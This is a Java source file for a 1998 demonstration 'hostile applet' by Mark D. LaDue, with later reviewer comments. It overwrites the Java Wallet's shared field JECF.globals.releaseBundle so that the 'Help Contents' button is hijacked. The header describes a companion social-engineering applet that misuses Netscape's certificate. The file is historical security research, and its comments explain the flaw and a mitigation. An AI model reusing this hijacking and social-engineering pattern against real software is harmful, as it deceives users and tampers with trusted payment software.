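/* BookMarker.java by Mark D. LaDue */

/* April 30, 1998 */

/*  Copyright (c) 1998 Mark D. LaDue
    You may study, use, modify, and distribute this example for any purpose.
    This example is provided WITHOUT WARRANTY either expressed or implied.  */

/*  This applet can alter the behavior of the Java Wallet's "Help Contents"
    button when run via the Java Plug-in 1.1. It works when your browser is
    Netscape's Communicator (4.04 or 4.05) on a UNIX platform such as Solaris.
    In order for the Java Wallet's "Help Contents" button to function properly
    on any platform, you must have jecf.browser.path set to the path of your
    browser in the jecf.properties file. Since this fact seems to be missing
    from the Java Wallet's documentation, this applet should be accompanied by
    a social engineering applet which reminds you to set this parameter
    properly. The accompanying applet, Helper.java, uses the Communicator's
    Java Security apparatus, along with Netscape's Certificate, in a social
    engineering effort to have you set jecf.browser.path. BookMarker then uses
    the Java Wallet to prompt you to push the "Help Contents" button. When
    it's successful, it will add a bookmark to the Hostile Applets Home
    Page.  */

import java.awt.*;
import java.io.*;
import java.net.*;
import javax.commerce.base.*;

/**
 * Historical (1998) demonstration applet, described by its author as harmless.
 *
 * <p>What the visible code does: {@link #init()} prints an explanatory notice
 * and downloads {@code offer.jcm} from the applet's code base; {@link #run()}
 * hands that offer to {@code OperationThread.startOperation} and then assigns a
 * {@code FakeResources} instance to {@code JECF.globals.releaseBundle}.
 *
 * <p>Security-relevant point for reviewers: the last step is a plain field
 * assignment made by downloaded applet code. According to the header comment
 * above, that is enough to change what the wallet's "Help Contents" button
 * does. The underlying weakness is therefore state shared with the wallet that
 * untrusted code can write; nothing in this file bypasses a check. The general
 * mitigation is for a framework to keep such state non-writable (private or
 * final, or behind a permission check) for code it does not trust.
 * {@code FakeResources} and the {@code javax.commerce.base} types are defined
 * outside this file, so their behaviour is not described here.
 */
public class BookMarker extends java.applet.Applet
        implements Runnable, TransactionListener {

    // Worker thread created by start(); null until the applet is started.
    Thread controller = null;

    // browserpath, urlstr and url are never read or written in this file.
    // They are kept because they are package-visible and other classes in the
    // same package could reference them.
    String browserpath = null;
    String urlstr = null;

    // Text of the downloaded offer plus a trailing newline; stays null if the
    // download in init() fails.
    String jcm = null;
    URL url;

    // On-screen log that carries the notice shown to the user.
    TextArea console = null;

    /**
     * Builds the notice text area and downloads {@code offer.jcm} from the
     * applet's code base into {@link #jcm}.
     *
     * <p>A failed download is reported in the console instead of being silently
     * dropped, and the network stream is closed on every path.
     */
    public void init() {
        // Tell what's going to happen
        console = new TextArea("BookMarker is a harmless demo applet.\n", 20, 80);
        console.setEditable(false);
        add(console);
        console.append("\nTo use it you must have already set up:\n");
        console.append("1. Sun's Java Plug-in 1.1;\n");
        console.append("2. Sun's Java Wallet PC Release 1.0 Early Access 1;\n");
        console.append("3. Sun's Purchase 1.1 Java Wallet cassette.\n");
        console.append("4. A Java Wallet user.\n");
        console.append("\nA second applet will run and display Netscape's\n");
        console.append("certificate in an effort to provide instructions\n");
        console.append("and a reassuring context. The applet's goal is to\n");
        console.append("alter the behavior of the Java Wallet's\n");
        console.append("\"Help Contents\" button and convince you to\n");
        console.append("use it. If this were a real attack, you would not\n");
        console.append("be warned, and you would have to discern everything\n");
        console.append("from what you see. The applet could also attempt to\n");
        console.append("do more than just add a bookmark.\n");

        // Download the offer which will be used to start the Java Wallet
        InputStream offerStream = null;
        try {
            // A local name is used so the unused field "url" is not shadowed.
            URL offerUrl = new URL(getCodeBase(), "offer.jcm");
            offerStream = new BufferedInputStream(offerUrl.openStream());
            ByteArrayOutputStream collected = new ByteArrayOutputStream();
            byte[] chunk = new byte[4096];
            int count;
            while ((count = offerStream.read(chunk, 0, chunk.length)) > 0) {
                collected.write(chunk, 0, count);
            }
            // NOTE(review): decoded with the platform default charset, as in
            // the original; the encoding of offer.jcm is not visible here.
            jcm = new String(collected.toByteArray()) + "\n";
        } catch (Exception exception) {
            // Surface the failure; jcm stays null in this case.
            console.append("\nCould not download offer.jcm: " + exception + "\n");
        } finally {
            if (offerStream != null) {
                try {
                    offerStream.close();
                } catch (IOException ignored) {
                    // Nothing useful can be done if closing fails.
                }
            }
        }
    }

    /** Starts the worker thread once; later calls do nothing while it is set. */
    public void start() {
        if (controller == null) {
            controller = new Thread(this);
            controller.start();
        }
    }

    /** Intentionally empty: the worker thread is not stopped here. */
    public void stop() {}

    /**
     * Worker body: starts a wallet operation with the downloaded offer, then
     * replaces {@code JECF.globals.releaseBundle}.
     *
     * <p>The replacement runs whether or not the wallet operation started, as
     * in the original. A failure to start is now written to the console.
     */
    public void run() {
        // Start the Java Wallet and have it display fake messages
        try {
            // Presumably a presence probe for the wallet classes; the returned
            // Class object was never used, so it is no longer stored.
            Class.forName("javax.commerce.base.OperationThread");
            OperationThread.startOperation(new JCM(jcm), this, (TransactionListener) this);
        } catch (Throwable throwable) {
            console.append("\nCould not start the Java Wallet operation: " + throwable + "\n");
        }

        // Alter the behavior of the "Help Contents" button
        // This single assignment is the security-relevant step: applet code
        // overwrites a field that the wallet also uses.
        JECF.globals.releaseBundle = new FakeResources();
    }

    /** Required by TransactionListener; events are ignored. */
    public void transactionPerformed(TransactionEvent transactionevent) {}
}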